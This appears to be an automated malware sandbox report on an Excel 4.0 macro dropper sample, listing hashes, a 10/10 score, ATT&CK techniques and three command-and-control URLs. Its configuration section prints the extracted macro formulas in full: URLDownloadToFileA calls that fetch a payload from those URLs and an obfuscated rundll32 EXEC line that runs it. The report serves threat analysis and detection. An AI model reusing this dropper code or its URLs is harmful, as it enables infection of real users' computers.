Overview

overview

10

Static

static

10

?i=1biefmipt.xlsm

windows7_x64

10

?i=1biefmipt.xlsm

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ?i=1biefmipt

  • Size

    83KB

  • Sample

    220522-f58n8abbhk

  • MD5

    9025de21ff8b4c4f735ed9dceff32cad

  • SHA1

    56ea6fd825d8790562107b9a93576cd715d5d21a

  • SHA256

    44b990e0cecfdbce9a3071b4b5a23cb9bfd7fbccb6fb5eb267b229a822c932b0

  • SHA512

    8cbbb6f9bb1728ac132e66eabb9dc31ce6b2aba861868cdac844ad9c101672c667b2a00c920dd1254c0c945dc1595eb26953592482a0ae255f27192c3e8c2bfe

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://recont.com/n8xbqb/lwEORjcJYPKCNQ/

http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/

https://www.moharrampartners.com/requestion/wiA/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://recont.com/n8xbqb/lwEORjcJYPKCNQ/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.moharrampartners.com/requestion/wiA/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://recont.com/n8xbqb/lwEORjcJYPKCNQ/
xlm40.dropper

http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/
xlm40.dropper

https://www.moharrampartners.com/requestion/wiA/

Targets

    • Target

      ?i=1biefmipt

    • Size

      83KB

    • MD5

      9025de21ff8b4c4f735ed9dceff32cad

    • SHA1

      56ea6fd825d8790562107b9a93576cd715d5d21a

    • SHA256

      44b990e0cecfdbce9a3071b4b5a23cb9bfd7fbccb6fb5eb267b229a822c932b0

    • SHA512

      8cbbb6f9bb1728ac132e66eabb9dc31ce6b2aba861868cdac844ad9c101672c667b2a00c920dd1254c0c945dc1595eb26953592482a0ae255f27192c3e8c2bfe

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks